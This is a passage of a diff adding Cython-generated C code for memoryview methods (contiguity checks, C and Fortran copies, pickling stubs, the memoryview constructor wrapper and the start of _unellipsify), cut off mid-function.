slice_is_contig(mslice[0], 'C', self.view.ndim) # <<<<<<<<<<<<<< + * + * def is_f_contig(self): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_2 = __Pyx_PyBool_FromLong(__pyx_memviewslice_is_contig((__pyx_v_mslice[0]), 'C', __pyx_v_self->view.ndim)); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 628, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "View.MemoryView":624 + * + * + * def is_c_contig(self): # <<<<<<<<<<<<<< + * cdef __Pyx_memviewslice *mslice + * cdef __Pyx_memviewslice tmp + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("View.MemoryView.memoryview.is_c_contig", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":630 + * return slice_is_contig(mslice[0], 'C', self.view.ndim) + * + * def is_f_contig(self): # <<<<<<<<<<<<<< + * cdef __Pyx_memviewslice *mslice + * cdef __Pyx_memviewslice tmp + */ + +/* Python wrapper */ +static PyObject *__pyx_memoryview_is_f_contig(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyObject *__pyx_memoryview_is_f_contig(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("is_f_contig (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("is_f_contig", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "is_f_contig", 0))) return NULL; + __pyx_r = __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_18is_f_contig(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_18is_f_contig(struct __pyx_memoryview_obj *__pyx_v_self) { + __Pyx_memviewslice *__pyx_v_mslice; + __Pyx_memviewslice __pyx_v_tmp; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + __Pyx_memviewslice *__pyx_t_1; + PyObject *__pyx_t_2 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("is_f_contig", 0); + + /* "View.MemoryView":633 + * cdef __Pyx_memviewslice *mslice + * cdef __Pyx_memviewslice tmp + * mslice = get_slice_from_memview(self, &tmp) # <<<<<<<<<<<<<< + * return slice_is_contig(mslice[0], 'F', self.view.ndim) + * + */ + __pyx_t_1 = __pyx_memoryview_get_slice_from_memoryview(__pyx_v_self, (&__pyx_v_tmp)); if (unlikely(__pyx_t_1 == ((__Pyx_memviewslice *)NULL))) __PYX_ERR(1, 633, __pyx_L1_error) + __pyx_v_mslice = __pyx_t_1; + + /* "View.MemoryView":634 + * cdef __Pyx_memviewslice tmp + * mslice = get_slice_from_memview(self, &tmp) + * return slice_is_contig(mslice[0], 'F', self.view.ndim) # <<<<<<<<<<<<<< + * + * def copy(self): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_2 = __Pyx_PyBool_FromLong(__pyx_memviewslice_is_contig((__pyx_v_mslice[0]), 'F', __pyx_v_self->view.ndim)); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 634, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "View.MemoryView":630 + * return slice_is_contig(mslice[0], 'C', self.view.ndim) + * + * def is_f_contig(self): # <<<<<<<<<<<<<< + * cdef __Pyx_memviewslice *mslice + * cdef __Pyx_memviewslice tmp + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("View.MemoryView.memoryview.is_f_contig", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":636 + * return slice_is_contig(mslice[0], 'F', self.view.ndim) + * + * def copy(self): # <<<<<<<<<<<<<< + * cdef __Pyx_memviewslice mslice + * cdef int flags = self.flags & ~PyBUF_F_CONTIGUOUS + */ + +/* Python wrapper */ +static PyObject *__pyx_memoryview_copy(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyObject *__pyx_memoryview_copy(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("copy (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("copy", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "copy", 0))) return NULL; + __pyx_r = __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_20copy(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_20copy(struct __pyx_memoryview_obj *__pyx_v_self) { + __Pyx_memviewslice __pyx_v_mslice; + int __pyx_v_flags; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + __Pyx_memviewslice __pyx_t_1; + PyObject *__pyx_t_2 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("copy", 0); + + /* "View.MemoryView":638 + * def copy(self): + * cdef __Pyx_memviewslice mslice + * cdef int flags = self.flags & ~PyBUF_F_CONTIGUOUS # <<<<<<<<<<<<<< + * + * slice_copy(self, &mslice) + */ + __pyx_v_flags = (__pyx_v_self->flags & (~PyBUF_F_CONTIGUOUS)); + + /* "View.MemoryView":640 + * cdef int flags = self.flags & ~PyBUF_F_CONTIGUOUS + * + * slice_copy(self, &mslice) # <<<<<<<<<<<<<< + * mslice = slice_copy_contig(&mslice, "c", self.view.ndim, + * self.view.itemsize, + */ + __pyx_memoryview_slice_copy(__pyx_v_self, (&__pyx_v_mslice)); + + /* "View.MemoryView":641 + * + * slice_copy(self, &mslice) + * mslice = slice_copy_contig(&mslice, "c", self.view.ndim, # <<<<<<<<<<<<<< + * self.view.itemsize, + * flags|PyBUF_C_CONTIGUOUS, + */ + __pyx_t_1 = __pyx_memoryview_copy_new_contig((&__pyx_v_mslice), ((char *)"c"), __pyx_v_self->view.ndim, __pyx_v_self->view.itemsize, (__pyx_v_flags | PyBUF_C_CONTIGUOUS), __pyx_v_self->dtype_is_object); if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 641, __pyx_L1_error) + __pyx_v_mslice = __pyx_t_1; + + /* "View.MemoryView":646 + * self.dtype_is_object) + * + * return memoryview_copy_from_slice(self, &mslice) # <<<<<<<<<<<<<< + * + * def copy_fortran(self): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_2 = __pyx_memoryview_copy_object_from_slice(__pyx_v_self, (&__pyx_v_mslice)); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 646, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "View.MemoryView":636 + * return slice_is_contig(mslice[0], 'F', self.view.ndim) + * + * def copy(self): # <<<<<<<<<<<<<< + * cdef __Pyx_memviewslice mslice + * cdef int flags = self.flags & ~PyBUF_F_CONTIGUOUS + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("View.MemoryView.memoryview.copy", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":648 + * return memoryview_copy_from_slice(self, &mslice) + * + * def copy_fortran(self): # <<<<<<<<<<<<<< + * cdef __Pyx_memviewslice src, dst + * cdef int flags = self.flags & ~PyBUF_C_CONTIGUOUS + */ + +/* Python wrapper */ +static PyObject *__pyx_memoryview_copy_fortran(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyObject *__pyx_memoryview_copy_fortran(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("copy_fortran (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("copy_fortran", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "copy_fortran", 0))) return NULL; + __pyx_r = __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_22copy_fortran(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_22copy_fortran(struct __pyx_memoryview_obj *__pyx_v_self) { + __Pyx_memviewslice __pyx_v_src; + __Pyx_memviewslice __pyx_v_dst; + int __pyx_v_flags; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + __Pyx_memviewslice __pyx_t_1; + PyObject *__pyx_t_2 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("copy_fortran", 0); + + /* "View.MemoryView":650 + * def copy_fortran(self): + * cdef __Pyx_memviewslice src, dst + * cdef int flags = self.flags & ~PyBUF_C_CONTIGUOUS # <<<<<<<<<<<<<< + * + * slice_copy(self, &src) + */ + __pyx_v_flags = (__pyx_v_self->flags & (~PyBUF_C_CONTIGUOUS)); + + /* "View.MemoryView":652 + * cdef int flags = self.flags & ~PyBUF_C_CONTIGUOUS + * + * slice_copy(self, &src) # <<<<<<<<<<<<<< + * dst = slice_copy_contig(&src, "fortran", self.view.ndim, + * self.view.itemsize, + */ + __pyx_memoryview_slice_copy(__pyx_v_self, (&__pyx_v_src)); + + /* "View.MemoryView":653 + * + * slice_copy(self, &src) + * dst = slice_copy_contig(&src, "fortran", self.view.ndim, # <<<<<<<<<<<<<< + * self.view.itemsize, + * flags|PyBUF_F_CONTIGUOUS, + */ + __pyx_t_1 = __pyx_memoryview_copy_new_contig((&__pyx_v_src), ((char *)"fortran"), __pyx_v_self->view.ndim, __pyx_v_self->view.itemsize, (__pyx_v_flags | PyBUF_F_CONTIGUOUS), __pyx_v_self->dtype_is_object); if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 653, __pyx_L1_error) + __pyx_v_dst = __pyx_t_1; + + /* "View.MemoryView":658 + * self.dtype_is_object) + * + * return memoryview_copy_from_slice(self, &dst) # <<<<<<<<<<<<<< + * + * + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_2 = __pyx_memoryview_copy_object_from_slice(__pyx_v_self, (&__pyx_v_dst)); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 658, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "View.MemoryView":648 + * return memoryview_copy_from_slice(self, &mslice) + * + * def copy_fortran(self): # <<<<<<<<<<<<<< + * cdef __Pyx_memviewslice src, dst + * cdef int flags = self.flags & ~PyBUF_C_CONTIGUOUS + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("View.MemoryView.memoryview.copy_fortran", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + */ + +/* Python wrapper */ +static PyObject *__pyx_pw___pyx_memoryview_1__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyObject *__pyx_pw___pyx_memoryview_1__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__reduce_cython__ (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("__reduce_cython__", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "__reduce_cython__", 0))) return NULL; + __pyx_r = __pyx_pf___pyx_memoryview___reduce_cython__(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf___pyx_memoryview___reduce_cython__(CYTHON_UNUSED struct __pyx_memoryview_obj *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__reduce_cython__", 0); + + /* "(tree fragment)":2 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" # <<<<<<<<<<<<<< + * def __setstate_cython__(self, __pyx_state): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + __Pyx_Raise(__pyx_builtin_TypeError, __pyx_kp_s_no_default___reduce___due_to_non, 0, 0); + __PYX_ERR(1, 2, __pyx_L1_error) + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("View.MemoryView.memoryview.__reduce_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + +/* Python wrapper */ +static PyObject *__pyx_pw___pyx_memoryview_3__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyObject *__pyx_pw___pyx_memoryview_3__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + CYTHON_UNUSED PyObject *__pyx_v___pyx_state = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__setstate_cython__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pyx_state,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pyx_state)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 3, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__setstate_cython__") < 0)) __PYX_ERR(1, 3, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v___pyx_state = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__setstate_cython__", 1, 1, 1, __pyx_nargs); __PYX_ERR(1, 3, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("View.MemoryView.memoryview.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf___pyx_memoryview_2__setstate_cython__(((struct __pyx_memoryview_obj *)__pyx_v_self), __pyx_v___pyx_state); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf___pyx_memoryview_2__setstate_cython__(CYTHON_UNUSED struct __pyx_memoryview_obj *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v___pyx_state) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__setstate_cython__", 0); + + /* "(tree fragment)":4 + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" # <<<<<<<<<<<<<< + */ + __Pyx_Raise(__pyx_builtin_TypeError, __pyx_kp_s_no_default___reduce___due_to_non, 0, 0); + __PYX_ERR(1, 4, __pyx_L1_error) + + /* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("View.MemoryView.memoryview.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":662 + * + * @cname('__pyx_memoryview_new') + * cdef memoryview_cwrapper(object o, int flags, bint dtype_is_object, __Pyx_TypeInfo *typeinfo): # <<<<<<<<<<<<<< + * cdef memoryview result = memoryview(o, flags, dtype_is_object) + * result.typeinfo = typeinfo + */ + +static PyObject *__pyx_memoryview_new(PyObject *__pyx_v_o, int __pyx_v_flags, int __pyx_v_dtype_is_object, __Pyx_TypeInfo *__pyx_v_typeinfo) { + struct __pyx_memoryview_obj *__pyx_v_result = 0; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("memoryview_cwrapper", 0); + + /* "View.MemoryView":663 + * @cname('__pyx_memoryview_new') + * cdef memoryview_cwrapper(object o, int flags, bint dtype_is_object, __Pyx_TypeInfo *typeinfo): + * cdef memoryview result = memoryview(o, flags, dtype_is_object) # <<<<<<<<<<<<<< + * result.typeinfo = typeinfo + * return result + */ + __pyx_t_1 = __Pyx_PyInt_From_int(__pyx_v_flags); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 663, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __Pyx_PyBool_FromLong(__pyx_v_dtype_is_object); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 663, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = PyTuple_New(3); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 663, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_INCREF(__pyx_v_o); + __Pyx_GIVEREF(__pyx_v_o); + PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_v_o); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_t_1); + __Pyx_GIVEREF(__pyx_t_2); + PyTuple_SET_ITEM(__pyx_t_3, 2, __pyx_t_2); + __pyx_t_1 = 0; + __pyx_t_2 = 0; + __pyx_t_2 = __Pyx_PyObject_Call(((PyObject *)__pyx_memoryview_type), __pyx_t_3, NULL); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 663, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __pyx_v_result = ((struct __pyx_memoryview_obj *)__pyx_t_2); + __pyx_t_2 = 0; + + /* "View.MemoryView":664 + * cdef memoryview_cwrapper(object o, int flags, bint dtype_is_object, __Pyx_TypeInfo *typeinfo): + * cdef memoryview result = memoryview(o, flags, dtype_is_object) + * result.typeinfo = typeinfo # <<<<<<<<<<<<<< + * return result + * + */ + __pyx_v_result->typeinfo = __pyx_v_typeinfo; + + /* "View.MemoryView":665 + * cdef memoryview result = memoryview(o, flags, dtype_is_object) + * result.typeinfo = typeinfo + * return result # <<<<<<<<<<<<<< + * + * @cname('__pyx_memoryview_check') + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF((PyObject *)__pyx_v_result); + __pyx_r = ((PyObject *)__pyx_v_result); + goto __pyx_L0; + + /* "View.MemoryView":662 + * + * @cname('__pyx_memoryview_new') + * cdef memoryview_cwrapper(object o, int flags, bint dtype_is_object, __Pyx_TypeInfo *typeinfo): # <<<<<<<<<<<<<< + * cdef memoryview result = memoryview(o, flags, dtype_is_object) + * result.typeinfo = typeinfo + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_AddTraceback("View.MemoryView.memoryview_cwrapper", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XDECREF((PyObject *)__pyx_v_result); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":668 + * + * @cname('__pyx_memoryview_check') + * cdef inline bint memoryview_check(object o) noexcept: # <<<<<<<<<<<<<< + * return isinstance(o, memoryview) + * + */ + +static CYTHON_INLINE int __pyx_memoryview_check(PyObject *__pyx_v_o) { + int __pyx_r; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + __Pyx_RefNannySetupContext("memoryview_check", 0); + + /* "View.MemoryView":669 + * @cname('__pyx_memoryview_check') + * cdef inline bint memoryview_check(object o) noexcept: + * return isinstance(o, memoryview) # <<<<<<<<<<<<<< + * + * cdef tuple _unellipsify(object index, int ndim): + */ + __pyx_t_1 = __Pyx_TypeCheck(__pyx_v_o, __pyx_memoryview_type); + __pyx_r = __pyx_t_1; + goto __pyx_L0; + + /* "View.MemoryView":668 + * + * @cname('__pyx_memoryview_check') + * cdef inline bint memoryview_check(object o) noexcept: # <<<<<<<<<<<<<< + * return isinstance(o, memoryview) + * + */ + + /* function exit code */ + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":671 + * return isinstance(o, memoryview) + * + * cdef tuple _unellipsify(object index, int ndim): # <<<<<<<<<<<<<< + * """ + * Replace all ellipses with full slices and fill incomplete indices with + */ + +static PyObject *_unellipsify(PyObject *__pyx_v_index, int __pyx_v_ndim) { + Py_ssize_t __pyx_v_idx; + PyObject *__pyx_v_tup = NULL; + PyObject *__pyx_v_result = NULL; + int __pyx_v_have_slices; + int __pyx_v_seen_ellipsis; + PyObject *__pyx_v_item = NULL; + Py_ssize_t __pyx_v_nslices; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_t_2; + PyObject *__pyx_t_3 = NULL; + Py_ssize_t __pyx_t_4; + Py_ssize_t __pyx_t_5; + Py_UCS4 __pyx_t_6; + PyObject *__pyx_t_7 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("_unellipsify", 0); + + /* "View.MemoryView":677 + * """ + * cdef Py_ssize_t idx + * tup = index if isinstance(index, tuple) else (index,) # <<<<<<<<<<<<<< + * + * result = [slice(None)] * ndim + */ + __pyx_t_2 = PyTuple_Check(__pyx_v_index); + if (__pyx_t_2) { + __Pyx_INCREF(((PyObject*)__pyx_v_index)); + __pyx_t_1 = __pyx_v_index; + } else { + __pyx_t_3 = PyTuple_New(1); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 677, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_INCREF(__pyx_v_index); + __Pyx_GIVEREF(__pyx_v_index); + PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_v_index); + __pyx_t_1 = __pyx_t_3; + __pyx_t_3 = 0; + } + __pyx_v_tup = ((PyObject*)__pyx_t_1); + __pyx_t_1 = 0; + + /* "View.MemoryView":679 + * tup = index if isinstance(index, tuple) else (index,) + * + * result = [slice(None)] * ndim # <<<<<<<<<<<<<< + * have_slices = False + * seen_ellipsis = False + */ + __pyx_t_1 = PyList_New(1 * ((__pyx_v_ndim<0) ? 0:__pyx_v_ndim)); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 679, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + { Py_ssize_t __pyx_temp; + for (__pyx_temp=0; __pyx_temp < __pyx_v_ndim; __pyx_temp++) { + __Pyx_INCREF(__pyx_slice__7); + __Pyx_GIVEREF(__pyx_slice__7); + 